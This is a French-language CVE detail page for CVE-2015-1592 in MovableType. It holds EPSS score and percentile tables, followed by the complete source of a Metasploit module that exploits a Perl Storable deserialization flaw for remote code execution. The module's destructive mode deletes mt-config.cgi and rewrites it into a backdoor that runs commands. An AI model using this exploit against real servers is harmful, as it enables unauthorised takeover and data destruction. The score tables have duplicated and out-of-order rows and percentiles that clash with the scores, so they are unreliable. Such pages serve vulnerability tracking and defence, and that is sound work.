CVE-2015-1592 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	92.24%	–	–
2023-03-12	–	–	–	84.69%	–
2023-03-26	–	–	–	84.9%	–
2023-05-28	–	–	–	87.15%	–
2023-10-29	–	–	–	87.67%	–
2024-01-28	–	–	–	85.55%	–
2024-04-14	–	–	–	85.55%	–
2024-06-02	–	–	–	85.55%	–
2024-08-25	–	–	–	85.6%	–
2024-11-17	–	–	–	86.27%	–
2024-12-22	–	–	–	94.69%	–
2025-01-05	–	–	–	95.28%	–
2025-02-23	–	–	–	94.81%	–
2025-01-19	–	–	–	95.28%	–
2025-02-23	–	–	–	94.81%	–
2025-03-18	–	–	–	–	84.46%
2025-04-12	–	–	–	–	83.66%
2025-04-22	–	–	–	–	81.05%
2025-04-22	–	–	–	–	81.05,%

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Date	Percentile
2022-02-06	1%
2023-03-12	98%
2023-03-26	98%
2023-05-28	98%
2023-10-29	98%
2024-01-28	98%
2024-04-14	99%
2024-06-02	99%
2024-08-25	99%
2024-11-17	99%
2024-12-22	99%
2025-01-05	1%
2025-02-23	99%
2025-01-19	1%
2025-02-23	99%
2025-03-18	99%
2025-04-12	99%
2025-04-22	99%
2025-04-22	99%

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'SixApart MovableType Storable Perl Code Execution', 'Description' => %q{ This module exploits a serialization flaw in MovableType before 5.2.12 to execute arbitrary code. The default nondestructive mode depends on the target server having the Object::MultiType and DateTime Perl modules installed in Perl's @INC paths. The destructive mode of operation uses only required MovableType dependencies, but it will noticeably corrupt the MovableType installation. }, 'Author' => [ 'John Lightsey', ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2015-1592' ], [ 'URL', 'https://movabletype.org/news/2015/02/movable_type_607_and_5212_released_to_close_security_vulnera.html' ], ], 'Privileged' => false, # web server context 'Payload' => { 'DisableNops' => true, 'BadChars' => ' ', 'Space' => 1024, }, 'Compat' => { 'PayloadType' => 'cmd' }, 'Platform' => ['unix'], 'Arch' => ARCH_CMD, 'Targets' => [['Automatic', {}]], 'DisclosureDate' => 'Feb 11 2015', 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'MoveableType cgi-bin directory path', '/cgi-bin/mt/']), OptBool.new('DESTRUCTIVE', [true, 'Use destructive attack method (more likely to succeed, but corrupts target system.)', false]) ], self.class ) end =begin #!/usr/bin/perl # generate config parameters for injection checks use Storable; { package XXXCHECKXXX; sub STORABLE_thaw { return 1; } sub STORABLE_freeze { return 1; } } my $check_obj = bless { ignore => 'this' }, XXXCHECKXXX; my $frozen = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . Storable::freeze({ x => $check_obj}); $frozen = unpack 'H*', $frozen; print "LFI test for storable flaw is: $frozen\n"; { package DateTime; use overload '+' => sub { 'ignored' }; } =end def check vprint_status("Sending storable test injection for XXXCHECKXXX.pm load failure") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'), 'vars_get' => { '__mode' => 'retry', 'step' => 'configure', 'config' => '53455247000000000000000304080831323334353637380408080803010000000413020b585858434845434b58585801310100000078' } }) unless res && res.code == 200 && res.body.include?("Can't locate XXXCHECKXXX.pm") vprint_status("Failed XXXCHECKXXX.pm load test"); return Exploit::CheckCode::Safe end Exploit::CheckCode::Vulnerable end def exploit if datastore['DESTRUCTIVE'] exploit_destructive else exploit_nondestructive end end =begin #!/usr/bin/perl # Generate nondestructive config parameter for RCE via Object::MultiType # and Try::Tiny. The generated value requires minor modification to insert # the payload inside the system() call and resize the padding. use Storable; { package Object::MultiType; use overload '+' => sub { 'ingored' }; } { package Object::MultiType::Saver; } { package DateTime; use overload '+' => sub { 'ingored' }; } { package Try::Tiny::ScopeGuard; } my $try_tiny_loader = bless {}, 'DateTime'; my $multitype_saver = bless { c => 'MT::run_app' }, 'Object::MultiType::Saver'; my $multitype_coderef = bless \$multitype_saver, 'Object::MultiType'; my $try_tiny_executor = bless [$multitype_coderef, 'MT;print qq{Content-type: text/plain\n\n};system(q{});' . ('#' x 1025) . "\nexit;"], 'Try::Tiny::ScopeGuard'; my $data = [$try_tiny_loader, $try_tiny_executor]; my $frozen = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . Storable::freeze($data); $frozen = unpack 'H*', $frozen; print "RCE payload requiring Object::MultiType and DateTime: $frozen\n"; =end def exploit_nondestructive print_status("Using nondestructive attack method") config_payload = "53455247000000000000000304080831323334353637380408080802020000001411084461746554696d6503000000000411155472793a3a54696e793a3a53636f7065477561726402020000001411114f626a6563743a3a4d756c7469547970650411184f626a6563743a3a4d756c7469547970653a3a536176657203010000000a0b4d543a3a72756e5f6170700100000063013d0400004d543b7072696e742071717b436f6e74656e742d747970653a20746578742f706c61696e5c6e5c6e7d3b73797374656d28717b" config_payload << payload.encoded.unpack('H*')[0] config_payload << "7d293b" config_payload << "23" * (1025 - payload.encoded.length) config_payload << "0a657869743b" print_status("Sending payload (#{payload.raw.length} bytes)") send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'), 'vars_get' => { '__mode' => 'retry', 'step' => 'configure', 'config' => config_payload } }, 5) end =begin #!/usr/bin/perl # Generate destructive config parameter to unlink mt-config.cgi use Storable; { package CGITempFile; } my $unlink_target = "mt-config.cgi"; my $cgitempfile = bless \$unlink_target, "CGITempFile"; my $data = [$cgitempfile]; my $frozen = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . Storable::freeze($data); $frozen = unpack 'H*', $frozen; print "RCE unlink payload requiring CGI: $frozen\n"; =end def exploit_destructive print_status("Using destructive attack method") # First we need to delete mt-config.cgi using the storable injection print_status("Sending storable injection to unlink mt-config.cgi") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'), 'vars_get' => { '__mode' => 'retry', 'step' => 'configure', 'config' => '534552470000000000000003040808313233343536373804080808020100000004110b43474954656d7046696c650a0d6d742d636f6e6669672e636769' } }) if res && res.code == 200 print_status("Successfully sent unlink request") else fail_with(Failure::Unknown, "Error sending unlink request") end # Now we rewrite mt-config.cgi to accept a payload print_status("Rewriting mt-config.cgi to accept the payload") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'), 'vars_get' => { '__mode' => 'next_step', 'step' => 'optional', 'default_language' => 'en_us', 'email_address_main' => "x\nObjectDriver mysql;use CGI;print qq{Content-type: text/plain\\n\\n};if(my $c = CGI->new()->param('xyzzy')){system($c);};unlink('mt-config.cgi');exit;1", 'set_static_uri_to' => '/', 'config' => '5345524700000000000000024800000001000000127365745f7374617469635f66696c655f746f2d000000012f', # equivalent to 'set_static_file_to' => '/', } }) if res && res.code == 200 print_status("Successfully sent mt-config rewrite request") else fail_with(Failure::Unknown, "Error sending mt-config rewrite request") end # Finally send the payload print_status("Sending payload request") send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'mt.cgi'), 'vars_get' => { 'xyzzy' => payload.encoded, } }, 5) end end